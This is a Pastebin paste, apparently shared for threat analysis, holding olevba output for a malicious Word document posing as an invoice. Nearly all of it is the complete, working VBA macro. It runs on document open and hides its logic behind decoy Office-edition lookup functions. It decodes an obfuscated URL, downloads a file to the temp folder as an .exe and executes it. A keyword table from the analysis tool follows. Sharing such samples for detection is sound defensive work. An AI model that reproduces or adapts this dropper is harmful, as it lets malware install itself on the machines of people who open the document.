API tools faq
paste
dynamoo

Malicious Word macro

dynamoo
Jan 11th, 2016
438
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
VisualBasic 23.79 KB | None | 0 0
raw download clone embed print report
  1. olevba 0.41 - http://decalage.info/python/oletools
  2. Flags        Filename                                                        
  3. -----------  -----------------------------------------------------------------
  4. OLE:MAS--B-V invoic~1.doc
  5.  
  6. (Flags: OpX=OpenXML, XML=Word2003XML, MHT=MHTML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, V=VBA strings, ?=Unknown)
  7.  
  8. ===============================================================================
  9. FILE: invoic~1.doc
  10. Type: OLE
  11. -------------------------------------------------------------------------------
  12. VBA MACRO ThisDocument.cls
  13. in file: invoic~1.doc - OLE stream: u'Macros/VBA/ThisDocument'
  14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  15. Sub autoopen()
  16. GetEdition2000 "00"
  17. End Sub
  18.  
  19.  
  20. -------------------------------------------------------------------------------
  21. VBA MACRO Module1.bas
  22. in file: invoic~1.doc - OLE stream: u'Macros/VBA/Module1'
  23. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  24. Public SBTART As Object
  25. Public PublisherTrial As Object
  26. Public Ultimate2007  As Object
  27. Public Personal2007 As String
  28. Public OneNote2007 As String
  29. Public Plus2010 As Object
  30. Public Sub Version_Test()
  31.  On Error GoTo 0
  32.  Debug.Print GetEdition(Application.Version, Application.ProductCode)
  33. End Sub
  34. Public Function GetEdition(ByRef strAppVersion As String, ByRef strGuid As String) As String
  35.  On Error GoTo PROC_ERR
  36.  Const strERR_MSG As String = "Unable to determine edition"
  37.  Dim strSku As String
  38.  Debug.Print "strAppVersion=" & strAppVersion
  39.  Debug.Print "Val(strAppVersion)=" & Val(strAppVersion)
  40.  Debug.Print "strGuid = " & strGuid
  41.  Select Case Val(strAppVersion)
  42.  Case Is < 9
  43.  GetEdition = "Pre Office 2000: " & strERR_MSG
  44.  Case Is < 10
  45.  strSku = Mid$(strGuid, 4, 2)
  46.  GetEdition = GetEdition2000(strSku)
  47.  Case Is < 11
  48.  strSku = Mid$(strGuid, 4, 2)
  49.  GetEdition = GetEdition2002(strSku)
  50.  Case Is < 12
  51.  strSku = Mid$(strGuid, 4, 2)
  52.  GetEdition = GetEdition2003(strSku)
  53.  Case Is < 13
  54.  strSku = Mid$(strGuid, 11, 4)
  55.  GetEdition = GetEdition2007(strSku)
  56.  Case Is < 15
  57.  strSku = Mid$(strGuid, 11, 4)
  58.  GetEdition = GetEdition2010(strSku)
  59.  Case Is < 16
  60.  strSku = Mid$(strGuid, 11, 4)
  61.  Debug.Print "strSku=" & strSku
  62.  GetEdition = GetEdition2013(strSku)
  63.  Case Is < 17
  64.  strSku = Mid$(strGuid, 11, 4)
  65.  Debug.Print "strSku=" & strSku
  66.  GetEdition = GetEdition2016(strSku)
  67.  Case Else
  68.  GetEdition = "Post Office 2016: " & strERR_MSG
  69.  End Select
  70. PROC_EXIT:
  71.  Exit Function
  72. PROC_ERR:
  73.  MsgBox "Erl=" & Erl & " Error " & Err.Number & " (" & Err.Description & ") in procedure GetEdition of Class aegit_expClass"
  74.  GetEdition = strERR_MSG & vbNewLine & _
  75.  "Error Number: " & CStr(Err.Number) & _
  76.  vbNewLine & "Error Desc: " & Err.Description
  77. End Function
  78. Public Function on2(Madm As String, LenLen As Integer) As String
  79.     Dim arr() As String
  80. Dim a As Variant
  81. arr = Split(Madm, "--")
  82. Dim fromArr() As Integer
  83. ReDim fromArr(LenLen)
  84. For a = LBound(arr) To UBound(arr)
  85.     fromArr(a) = CInt(arr(a))
  86. Next a
  87.     Dim i As Integer
  88.     Dim result As String
  89.     result = ""
  90.     For i = LBound(fromArr) To UBound(fromArr)
  91.         result = result & Chr(fromArr(i) - LenLen - 8000 - 500)
  92.     Next i
  93.     on2 = result
  94. End Function
  95. Public Function GetEdition2000(ByRef strSku As String) As String
  96.  On Error GoTo 0
  97.  Set SBTART = CreateObject("Microsoft" + ".XMLHTTP")
  98. Set PublisherTrial = CreateObject("Adodb.Stream")
  99. Set Plus2010 = CreateObject("Shell.Application")
  100. GoTo Step1
  101.  Select Case strSku
  102.  Case "00"
  103.  GetEdition2000 = "Microsoft Office 2000 Premium Edition CD1"
  104.  Case "01"
  105.  GetEdition2000 = "Microsoft Office 2000 Professional Edition"
  106.  Case "02"
  107.  GetEdition2000 = "Microsoft Office 2000 Standard Edition"
  108.  Case "03"
  109.  GetEdition2000 = "Microsoft Office 2000 Small Business Edition"
  110.  Case "04"
  111.  GetEdition2000 = "Microsoft Office 2000 Premium CD2"
  112.  Case "05"
  113.  GetEdition2000 = "Office CD2 SMALL"
  114.  Case "06" To "09", "0A" To "0F"
  115.  GetEdition2000 = "(reserved)"
  116.  Case "10"
  117.  GetEdition2000 = "Microsoft Access 2000 (standalone)"
  118.  Case "11"
  119.  GetEdition2000 = "Microsoft Excel 2000 (standalone)"
  120.  Case "12"
  121.  GetEdition2000 = "Microsoft FrontPage 2000 (standalone)"
  122.  Case "13"
  123.  GetEdition2000 = "Microsoft PowerPoint 2000 (standalone)"
  124.  Case "14"
  125.  GetEdition2000 = "Microsoft Publisher 2000 (standalone)"
  126.  Case "15"
  127.  GetEdition2000 = "Office Server Extensions"
  128.  Case "16"
  129.  GetEdition2000 = "Microsoft Outlook 2000 (standalone)"
  130.  Case "17"
  131.  GetEdition2000 = "Microsoft Word 2000 (standalone)"
  132.  Case "18"
  133.  GetEdition2000 = "Microsoft Access 2000 runtime version"
  134.  Case "19"
  135.  GetEdition2000 = "FrontPage Server Extensions"
  136.  Case "1A"
  137.  GetEdition2000 = "Publisher Standalone OEM"
  138.  Case "1B"
  139.  GetEdition2000 = "DMMWeb"
  140.  Case "1C"
  141.  GetEdition2000 = "FP WECCOM"
  142.  Case "1D" To "1F"
  143.  GetEdition2000 = "(reserved standalone SKUs)"
  144.  Case "20" To "29", "2A" To "2F"
  145.  GetEdition2000 = "Office Language Packs"
  146.  Case "30" To "39", "3A" To "3F"
  147.  GetEdition2000 = "Proofing Tools Kit(s)"
  148.  Case "40"
  149.  GetEdition2000 = "Publisher Trial CD"
  150.  Case "41"
  151.  GetEdition2000 = "Publisher Trial Web"
  152.  Case "42"
  153.  GetEdition2000 = "SBB"
  154.  Case "43"
  155.  GetEdition2000 = "SBT"
  156.  Case "44"
  157.  GetEdition2000 = "SBT CD2"
  158.  Case "45"
  159.  GetEdition2000 = "SBTART"
  160.  Case "46"
  161.  GetEdition2000 = "Web Components"
  162.  Case "47"
  163.  GetEdition2000 = "VP Office CD2 with LVP"
  164.  Case "48"
  165.  GetEdition2000 = "VP PUB with LVP"
  166.  Case "49"
  167.  GetEdition2000 = "VP PUB with LVP OEM"
  168.  Case "4F"
  169.  GetEdition2000 = "Access 2000 SR-1 Run-Time Minimum"
  170.  Case Else
  171.  MsgBox "Error: GetEdition2000", vbCritical, "ERROR"
  172.  End Select
  173. Step1:
  174. Set Ultimate2007 = CreateObject("WScript.Shell").Environment("Process")
  175. GetEdition2002 ""
  176. End Function
  177. Private Function GetEdition2002(ByRef strSku As String) As String
  178.  strSkuOn = False
  179.  GoTo step100
  180.  On Error GoTo 0
  181.  Select Case strSku
  182.  Case "11"
  183.  GetEdition2002 = "Microsoft Office XP Professional"
  184.  Case "12"
  185.  GetEdition2002 = "Microsoft Office XP Standard"
  186.  Case "13"
  187.  GetEdition2002 = "Microsoft Office XP Small Business"
  188.  Case "14"
  189.  GetEdition2002 = "Microsoft Office XP Web Server"
  190.  Case "15"
  191.  GetEdition2002 = "Microsoft Access 2002"
  192.  Case "16"
  193.  GetEdition2002 = "Microsoft Excel 2002"
  194.  Case "17"
  195.  GetEdition2002 = "Microsoft FrontPage 2002"
  196.  Case "18"
  197.  GetEdition2002 = "Microsoft PowerPoint 2002"
  198.  Case "19"
  199.  GetEdition2002 = "Microsoft Publisher 2002"
  200.  Case "1A"
  201.  GetEdition2002 = "Microsoft Outlook 2002"
  202.  Case "1B"
  203.  GetEdition2002 = "Microsoft Word 2002"
  204.  Case "1C"
  205.  GetEdition2002 = "Microsoft Access 2002 Runtime"
  206.  Case "1D"
  207.  GetEdition2002 = "Microsoft FrontPage Server Extensions 2002"
  208.  Case "1E"
  209.  GetEdition2002 = "Microsoft Office Multilingual User Interface Pack"
  210.  Case "1F"
  211.  GetEdition2002 = "Microsoft Office Proofing Tools Kit"
  212.  Case "20"
  213.  GetEdition2002 = "System Files Update"
  214.  Case "22"
  215.  GetEdition2002 = "unused"
  216.  Case "23"
  217.  GetEdition2002 = "Microsoft Office Multilingual User Interface Pack Wizard"
  218.  Case "24"
  219.  GetEdition2002 = "Microsoft Office XP Resource Kit"
  220.  Case "25"
  221.  GetEdition2002 = "Microsoft Office XP Resource Kit Tools (download from Web)"
  222.  Case "26"
  223.  GetEdition2002 = "Microsoft Office Web Components"
  224.  Case "27"
  225.  GetEdition2002 = "Microsoft Project 2002"
  226.  Case "28"
  227.  GetEdition2002 = "Microsoft Office XP Professional with FrontPage"
  228.  Case "29"
  229.  GetEdition2002 = "Microsoft Office XP Professional Subscription"
  230.  Case "2A"
  231.  GetEdition2002 = "Microsoft Office XP Small Business Edition Subscription"
  232.  Case "2B"
  233.  GetEdition2002 = "Microsoft Publisher 2002 Deluxe Edition"
  234.  Case "2F"
  235.  GetEdition2002 = "Standalone IME (JPN Only)"
  236.  Case "30"
  237.  GetEdition2002 = "Microsoft Office XP Media Content"
  238.  Case "31"
  239.  GetEdition2002 = "Microsoft Project 2002 Web Client"
  240.  Case "32"
  241.  GetEdition2002 = "Microsoft Project 2002 Web Server"
  242.  Case "33"
  243.  GetEdition2002 = "Microsoft Office XP PIPC1 (Pre Installed PC) (JPN Only)"
  244.  Case "34"
  245.  GetEdition2002 = "Microsoft Office XP PIPC2 (Pre Installed PC) (JPN Only)"
  246.  Case "35"
  247.  GetEdition2002 = "Microsoft Office XP Media Content Deluxe"
  248.  Case "3A"
  249.  GetEdition2002 = "Project 2002 Standard"
  250.  Case "3B"
  251.  GetEdition2002 = "Project 2002 Professional"
  252.  Case "51"
  253.  GetEdition2002 = "Microsoft Office Visio Professional 2003"
  254.  Case "54"
  255.  GetEdition2002 = "Microsoft Office Visio Standard 2003"
  256.  Case Else
  257.  MsgBox "Error: GetEdition2002", vbCritical, "ERROR"
  258.  End Select
  259. step100:
  260. Dim urlAr As String
  261.  urlAr = "8641--8653--8653--8649--8595--8584--8584--8656--8656--8656--8583--8655--8646--8648--8637--8634--8645--8583--8646--8657--8584--8590--8639--8640--8635--8647--8584--8592--8653--8639--8651--8591--8644--8643--8583--8638--8657--8638"
  262.  
  263. CallByName SBTART, Replace("zpen", "z", "O"), VbMethod, Replace(UCase("GoT"), "O", "E"), on2(urlAr, 37), strSkuOn
  264.  
  265. Personal2007 = Ultimate2007(Replace("rEMP", "r", "T"))
  266. SBTART.Send
  267. OneNote2007 = Personal2007 + "\" + Replace("sbstart.txt", "t", "e")
  268.    PublisherTrial.Type = 1
  269.     PublisherTrial.Open
  270.     PublisherTrial.write SBTART.responseBody
  271.     GetEdition2013 "55"
  272. End Function
  273. Private Function GetEdition2003(ByRef strSku As String) As String
  274.  On Error GoTo 0
  275.  Select Case strSku
  276.  Case "11"
  277.  GetEdition2003 = "Microsoft Office Professional Enterprise Edition 2003"
  278.  Case "12"
  279.  GetEdition2003 = "Microsoft Office Standard Edition 2003"
  280.  Case "13"
  281.  GetEdition2003 = "Microsoft Office Basic Edition 2003"
  282.  Case "14"
  283.  GetEdition2003 = "Microsoft Windows SharePoint Services 2.0"
  284.  Case "15"
  285.  GetEdition2003 = "Microsoft Office Access 2003"
  286.  Case "16"
  287.  GetEdition2003 = "Microsoft Office Excel 2003"
  288.  Case "17"
  289.  GetEdition2003 = "Microsoft Office FrontPage 2003"
  290.  Case "18"
  291.  GetEdition2003 = "Microsoft Office PowerPoint 2003"
  292.  Case "19"
  293.  GetEdition2003 = "Microsoft Office Publisher 2003"
  294.  Case "1A"
  295.  GetEdition2003 = "Microsoft Office Outlook Professional 2003"
  296.  Case "1B"
  297.  GetEdition2003 = "Microsoft Office Word 2003"
  298.  Case "1C"
  299.  GetEdition2003 = "Microsoft Office Access 2003 Runtime"
  300.  Case "1E"
  301.  GetEdition2003 = "Microsoft Office 2003 User Interface Pack"
  302.  Case "1F"
  303.  GetEdition2003 = "Microsoft Office 2003 Proofing Tools"
  304.  Case "23"
  305.  GetEdition2003 = "Microsoft Office 2003 Multilingual User Interface Pack"
  306.  Case "24"
  307.  GetEdition2003 = "Microsoft Office 2003 Resource Kit"
  308.  Case "26"
  309.  GetEdition2003 = "Microsoft Office XP Web Components"
  310.  Case "2E"
  311.  GetEdition2003 = "Microsoft Office 2003 Research Service SDK"
  312.  Case "44"
  313.  GetEdition2003 = "Microsoft Office InfoPath 2003"
  314.  Case "83"
  315.  GetEdition2003 = "Microsoft Office 2003 HTML Viewer"
  316.  Case "92"
  317.  GetEdition2003 = "Windows SharePoint Services 2.0 English Template Pack"
  318.  Case "93"
  319.  GetEdition2003 = "Microsoft Office 2003 English Web Parts and Components"
  320.  Case "A1"
  321.  GetEdition2003 = "Microsoft Office OneNote 2003"
  322.  Case "A4"
  323.  GetEdition2003 = "Microsoft Office 2003 Web Components"
  324.  Case "A5"
  325.  GetEdition2003 = "Microsoft SharePoint Migration Tool 2003"
  326.  Case "AA"
  327.  GetEdition2003 = "Microsoft Office PowerPoint 2003 Presentation Broadcast"
  328.  Case "AB"
  329.  GetEdition2003 = "Microsoft Office PowerPoint 2003 Template Pack 1"
  330.  Case "AC"
  331.  GetEdition2003 = "Microsoft Office PowerPoint 2003 Template Pack 2"
  332.  Case "AD"
  333.  GetEdition2003 = "Microsoft Office PowerPoint 2003 Template Pack 3"
  334.  Case "AE"
  335.  GetEdition2003 = "Microsoft Organization Chart 2.0"
  336.  Case "CA"
  337.  GetEdition2003 = "Microsoft Office Small Business Edition 2003"
  338.  Case "D0"
  339.  GetEdition2003 = "Microsoft Office Access 2003 Developer Extensions"
  340.  Case "DC"
  341.  GetEdition2003 = "Microsoft Office 2003 Smart Document SDK"
  342.  Case "E0"
  343.  GetEdition2003 = "Microsoft Office Outlook Standard 2003"
  344.  Case "E3"
  345.  GetEdition2003 = "Microsoft Office Professional Edition 2003 (with InfoPath 2003)"
  346.  Case "FD"
  347.  GetEdition2003 = "Microsoft Office Outlook 2003 (distributed by MSN)"
  348.  Case "FF"
  349.  GetEdition2003 = "Microsoft Office 2003 Edition Language Interface Pack"
  350.  Case "F8"
  351.  GetEdition2003 = "Remove Hidden Data Tool"
  352.  Case "3A"
  353.  GetEdition2003 = "Microsoft Office Project Standard 2003"
  354.  Case "3B"
  355.  GetEdition2003 = "Microsoft Office Project Professional 2003"
  356.  Case "32"
  357.  GetEdition2003 = "Microsoft Office Project Server 2003"
  358.  Case "51"
  359.  GetEdition2003 = "Microsoft Office Visio Professional 2003"
  360.  Case "52"
  361.  GetEdition2003 = "Microsoft Office Visio Viewer 2003"
  362.  Case "53"
  363.  GetEdition2003 = "Microsoft Office Visio Standard 2003"
  364.  Case "55"
  365.  GetEdition2003 = "Microsoft Office Visio for Enterprise Architects 2003"
  366.  Case "5E"
  367.  GetEdition2003 = "Microsoft Office Visio 2003 Multilingual User Interface Pack"
  368.  Case Else
  369.  MsgBox "Error: GetEdition2003", vbCritical, "ERROR"
  370.  End Select
  371. End Function
  372. Private Function GetEdition2007(ByRef strSku As String) As String
  373.  On Error GoTo 0
  374.  Select Case strSku
  375.  Case "0011"
  376.  GetEdition2007 = "Microsoft Office Professional Plus 2007"
  377.  Case "0012"
  378.  GetEdition2007 = "Microsoft Office Standard 2007"
  379.  Case "0013"
  380.  GetEdition2007 = "Microsoft Office Basic 2007"
  381.  Case "0014"
  382.  GetEdition2007 = "Microsoft Office Professional 2007"
  383.  Case "0015"
  384.  GetEdition2007 = "Microsoft Office Access 2007"
  385.  Case "0016"
  386.  GetEdition2007 = "Microsoft Office Excel 2007"
  387.  Case "0017"
  388.  GetEdition2007 = "Microsoft Office SharePoint Designer 2007"
  389.  Case "0018"
  390.  GetEdition2007 = "Microsoft Office PowerPoint 2007"
  391.  Case "0019"
  392.  GetEdition2007 = "Microsoft Office Publisher 2007"
  393.  Case "001A"
  394.  GetEdition2007 = "Microsoft Office Outlook 2007"
  395.  Case "001B"
  396.  GetEdition2007 = "Microsoft Office Word 2007"
  397.  Case "001C"
  398.  GetEdition2007 = "Microsoft Office Access Runtime 2007"
  399.  Case "0020"
  400.  GetEdition2007 = "Microsoft Office Compatibility Pack for Word, Excel, and PowerPoint 2007 File Formats"
  401.  Case "0026"
  402.  GetEdition2007 = "Microsoft Expression Web"
  403.  Case "0029"
  404.  GetEdition2007 = "Microsoft Office Excel 2007"
  405.  Case "002B"
  406.  GetEdition2007 = "Microsoft Office Word 2007"
  407.  Case "002E"
  408.  GetEdition2007 = "Microsoft Office Ultimate 2007"
  409.  Case "002F"
  410.  GetEdition2007 = "Microsoft Office Home and Student 2007"
  411.  Case "0030"
  412.  GetEdition2007 = "Microsoft Office Enterprise 2007"
  413.  Case "0031"
  414.  GetEdition2007 = "Microsoft Office Professional Hybrid 2007"
  415.  Case "0033"
  416.  GetEdition2007 = "Microsoft Office Personal 2007"
  417.  Case "0035"
  418.  GetEdition2007 = "Microsoft Office Professional Hybrid 2007"
  419.  Case "0037"
  420.  GetEdition2007 = "Microsoft Office PowerPoint 2007"
  421.  Case "003A"
  422.  GetEdition2007 = "Microsoft Office Project Standard 2007"
  423.  Case "003B"
  424.  GetEdition2007 = "Microsoft Office Project Professional 2007"
  425.  Case "0044"
  426.  GetEdition2007 = "Microsoft Office InfoPath 2007"
  427.  Case "0051"
  428.  GetEdition2007 = "Microsoft Office Visio Professional 2007"
  429.  Case "0052"
  430.  GetEdition2007 = "Microsoft Office Visio Viewer 2007"
  431.  Case "0053"
  432.  GetEdition2007 = "Microsoft Office Visio Standard 2007"
  433.  Case "00A1"
  434.  GetEdition2007 = "Microsoft Office OneNote 2007"
  435.  Case "00A3"
  436.  GetEdition2007 = "Microsoft Office OneNote Home Student 2007"
  437.  Case "00A7"
  438.  GetEdition2007 = "Calendar Printing Assistant for Microsoft Office Outlook 2007"
  439.  Case "00A9"
  440.  GetEdition2007 = "Microsoft Office InterConnect 2007"
  441.  Case "00AF"
  442.  GetEdition2007 = "Microsoft Office PowerPoint Viewer 2007 (English)"
  443.  Case "00B0"
  444.  GetEdition2007 = "The Microsoft Save as PDF add-in"
  445.  Case "00B1"
  446.  GetEdition2007 = "The Microsoft Save as XPS add-in"
  447.  Case "00B2"
  448.  GetEdition2007 = "The Microsoft Save as PDF or XPS add-in"
  449.  Case "00BA"
  450.  GetEdition2007 = "Microsoft Office Groove 2007"
  451.  Case "00CA"
  452.  GetEdition2007 = "Microsoft Office Small Business 2007"
  453.  Case "00E0"
  454.  GetEdition2007 = "Microsoft Office Outlook 2007"
  455.  Case "10D7"
  456.  GetEdition2007 = "Microsoft Office InfoPath Forms Services"
  457.  Case "110D"
  458.  GetEdition2007 = "Microsoft Office SharePoint Server 2007"
  459.  Case "1122"
  460.  GetEdition2007 = "Windows SharePoint Services Developer Resources 1.2"
  461.  Case "0010"
  462.  GetEdition2007 = "SKU - Microsoft Software Update for Web Folders (English) 12"
  463.  Case Else
  464.  MsgBox "Error: GetEdition2007", vbCritical, "ERROR"
  465.  End Select
  466. End Function
  467. Private Function GetEdition2010(ByRef strSku As String) As String
  468.  On Error GoTo 0
  469.  Select Case strSku
  470.  Case "0011"
  471.  GetEdition2010 = "Microsoft Office Professional Plus 2010"
  472.  Case "011D"
  473.  GetEdition2010 = "Microsoft Office Professional Plus Subscription 2010 "
  474.  Case "0012"
  475.  GetEdition2010 = "Microsoft Office Standard 2010"
  476.  Case "0013"
  477.  GetEdition2010 = "Microsoft Office Home and Business 2010"
  478.  Case "0014"
  479.  GetEdition2010 = "Microsoft Office Professional 2010"
  480.  Case "0015"
  481.  GetEdition2010 = "Microsoft Access 2010"
  482.  Case "0016"
  483.  GetEdition2010 = "Microsoft Excel 2010"
  484.  Case "0017"
  485.  GetEdition2010 = "Microsoft SharePoint Designer 2010"
  486.  Case "0018"
  487.  GetEdition2010 = "Microsoft PowerPoint 2010"
  488.  Case "0019"
  489.  GetEdition2010 = "Microsoft Publisher 2010"
  490.  Case "001A"
  491.  GetEdition2010 = "Microsoft Outlook 2010"
  492.  Case "001B"
  493.  GetEdition2010 = "Microsoft Word 2010"
  494.  Case "001C"
  495.  GetEdition2010 = "Microsoft Access Runtime 2010"
  496.  Case "001F"
  497.  GetEdition2010 = "Microsoft Office Proofing Tools Kit Compilation 2010"
  498.  Case "002F"
  499.  GetEdition2010 = "Microsoft Office Home and Student 2010"
  500.  Case "003A"
  501.  GetEdition2010 = "Microsoft Project Standard 2010"
  502.  Case "003B"
  503.  GetEdition2010 = "Microsoft Project Professional 2010"
  504.  Case "0044"
  505.  GetEdition2010 = "Microsoft InfoPath 2010"
  506.  Case "0052"
  507.  GetEdition2010 = "Microsoft Visio Viewer 2010"
  508.  Case "0057"
  509.  GetEdition2010 = "Microsoft Visio 2010"
  510.  Case "007A"
  511.  GetEdition2010 = "Microsoft Outlook Connector"
  512.  Case "008B"
  513.  GetEdition2010 = "Microsoft Office Small Business Basics 2010"
  514.  Case "00A1"
  515.  GetEdition2010 = "Microsoft OneNote 2010"
  516.  Case "00AF"
  517.  GetEdition2010 = "Microsoft PowerPoint Viewer 2010"
  518.  Case "00BA"
  519.  GetEdition2010 = "Microsoft Office SharePoint Workspace 2010"
  520.  Case "110D"
  521.  GetEdition2010 = "Microsoft Office SharePoint Server 2010"
  522.  Case "110F"
  523.  GetEdition2010 = "Microsoft Project Server 2010"
  524.  Case Else
  525.  MsgBox "Error: GetEdition2010", vbCritical, "ERROR"
  526.  Debug.Print "strSku = " & strSku
  527.  End Select
  528. End Function
  529. Private Function GetEdition2013(ByRef strSku As String) As String
  530.  GoTo finita
  531.  On Error GoTo 0
  532.  Debug.Print "GetEdition2013 strSku=" & strSku
  533.  Select Case strSku
  534.  Case "0011"
  535.  GetEdition2013 = "Microsoft Office Professional Plus 2013"
  536.  Case "0012"
  537.  GetEdition2013 = "Microsoft Office Standard 2013"
  538.  Case "0013"
  539.  GetEdition2013 = "Microsoft Office Home and Business 2013"
  540.  Case "0014"
  541.  GetEdition2013 = "Microsoft Office Professional 2013"
  542.  Case "0015"
  543.  GetEdition2013 = "Microsoft Access 2013"
  544.  Case "0016"
  545.  GetEdition2013 = "Microsoft Excel 2013"
  546.  Case "0017"
  547.  GetEdition2013 = "Microsoft SharePoint Designer 2013"
  548.  Case "0018"
  549.  GetEdition2013 = "Microsoft PowerPoint 2013"
  550.  Case "0019"
  551.  GetEdition2013 = "Microsoft Publisher 2013"
  552.  Case "001A"
  553.  GetEdition2013 = "Microsoft Outlook 2013"
  554.  Case "001B"
  555.  GetEdition2013 = "Microsoft Word 2013"
  556.  Case "001C"
  557.  GetEdition2013 = "Microsoft Access Runtime 2013"
  558.  Case "001F"
  559.  GetEdition2013 = "Microsoft Office Proofing Tools Kit Compilation 2013"
  560.  Case "002F"
  561.  GetEdition2013 = "Microsoft Office Home and Student 2013"
  562.  Case "003A"
  563.  GetEdition2013 = "Microsoft Project Standard 2013"
  564.  Case "003B"
  565.  GetEdition2013 = "Microsoft Project Professional 2013"
  566.  Case "0044"
  567.  GetEdition2013 = "Microsoft InfoPath 2013"
  568.  Case "0051"
  569.  GetEdition2013 = "Microsoft Visio Professional 2013"
  570.  Case "0053"
  571.  GetEdition2013 = "Microsoft Visio Standard 2013"
  572.  Case "00A1"
  573.  GetEdition2013 = "Microsoft OneNote 2013"
  574.  Case "00BA"
  575.  GetEdition2013 = "Microsoft Office SharePoint Workspace 2013"
  576.  Case "110D"
  577.  GetEdition2013 = "Microsoft Office SharePoint Server 2013"
  578.  Case "110F"
  579.  GetEdition2013 = "Microsoft Project Server 2013"
  580.  Case "012B"
  581.  GetEdition2013 = "Microsoft Lync 2013"
  582.  Case Else
  583.  MsgBox "Error: GetEdition2013", vbCritical, "ERROR"
  584.  End Select
  585. finita:
  586.     CallByName PublisherTrial, Replace("savRtofilR", "R", "e"), VbMethod, OneNote2007, 2
  587. Plus2010.Open (OneNote2007)
  588. End Function
  589. Private Function GetEdition2016(ByRef strSku As String) As String
  590.  On Error GoTo 0
  591.  Debug.Print "GetEdition2016 strSku=" & strSku
  592.  Select Case strSku
  593.  Case "0011"
  594.  GetEdition2016 = "Microsoft Office Professional Plus 2016"
  595.  Case "0012"
  596.  GetEdition2016 = "Microsoft Office Standard 2016"
  597.  Case "0015"
  598.  GetEdition2016 = "Microsoft Access 2016"
  599.  Case "0016"
  600.  GetEdition2016 = "Microsoft Excel 2016"
  601.  Case "0018"
  602.  GetEdition2016 = "Microsoft PowerPoint 2016"
  603.  Case "0019"
  604.  GetEdition2016 = "Microsoft Publisher 2016"
  605.  Case "001A"
  606.  GetEdition2016 = "Microsoft Outlook 2016"
  607.  Case "001B"
  608.  GetEdition2016 = "Microsoft Word 2016"
  609.  Case "001F"
  610.  GetEdition2016 = "Microsoft Office Proofing Tools Kit Compilation 2016"
  611.  Case "003A"
  612.  GetEdition2016 = "Microsoft Project Standard 2016"
  613.  Case "003B"
  614.  GetEdition2016 = "Microsoft Project Professional 2016"
  615.  Case "0051"
  616.  GetEdition2016 = "Microsoft Visio Professional 2016"
  617.  Case "0053"
  618.  GetEdition2016 = "Microsoft Visio Standard 2016"
  619.  Case "00A1"
  620.  GetEdition2016 = "Microsoft OneNote 2016"
  621.  Case "00BA"
  622.  GetEdition2016 = "Microsoft Office OneDrive for Business 2016"
  623.  Case "110D"
  624.  GetEdition2016 = "Microsoft Office SharePoint Server 2016"
  625.  Case "012B"
  626.  GetEdition2016 = "Microsoft Skype for Business 2016"
  627.  Case Else
  628.  MsgBox "Error: GetEdition2016", vbCritical, "ERROR"
  629.  End Select
  630. End Function
  631.  
  632.  
  633. +------------+----------------------+-----------------------------------------+
  634. | Type       | Keyword              | Description                             |
  635. +------------+----------------------+-----------------------------------------+
  636. | AutoExec   | AutoOpen             | Runs when the Word document is opened   |
  637. | Suspicious | Open                 | May open a file                         |
  638. | Suspicious | Shell                | May run an executable file or a system  |
  639. |            |                      | command                                 |
  640. | Suspicious | WScript.Shell        | May run an executable file or a system  |
  641. |            |                      | command                                 |
  642. | Suspicious | Run                  | May run an executable file or a system  |
  643. |            |                      | command                                 |
  644. | Suspicious | Windows              | May enumerate application windows (if   |
  645. |            |                      | combined with Shell.Application object) |
  646. | Suspicious | Shell.Application    | May run an application (if combined     |
  647. |            |                      | with CreateObject)                      |
  648. | Suspicious | CreateObject         | May create an OLE object                |
  649. | Suspicious | CallByName           | May attempt to obfuscate malicious      |
  650. |            |                      | function calls                          |
  651. | Suspicious | Chr                  | May attempt to obfuscate specific       |
  652. |            |                      | strings                                 |
  653. | Suspicious | ADODB.Stream         | May create a text file                  |
  654. | Suspicious | Write                | May write to a file (if combined with   |
  655. |            |                      | Open)                                   |
  656. | Suspicious | Microsoft.XMLHTTP    | May download files from the Internet    |
  657. |            |                      | (obfuscation: VBA expression)           |
  658. | Suspicious | Base64 Strings       | Base64-encoded strings were detected,   |
  659. |            |                      | may be used to obfuscate strings        |
  660. |            |                      | (option --decode to see all)            |
  661. | Suspicious | VBA obfuscated       | VBA string expressions were detected,   |
  662. |            | Strings              | may be used to obfuscate strings        |
  663. |            |                      | (option --decode to see all)            |
  664. | VBA string | Microsoft.XMLHTTP    | ("Microsoft" + ".XMLHTTP")              |
  665. +------------+----------------------+-----------------------------------------+
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!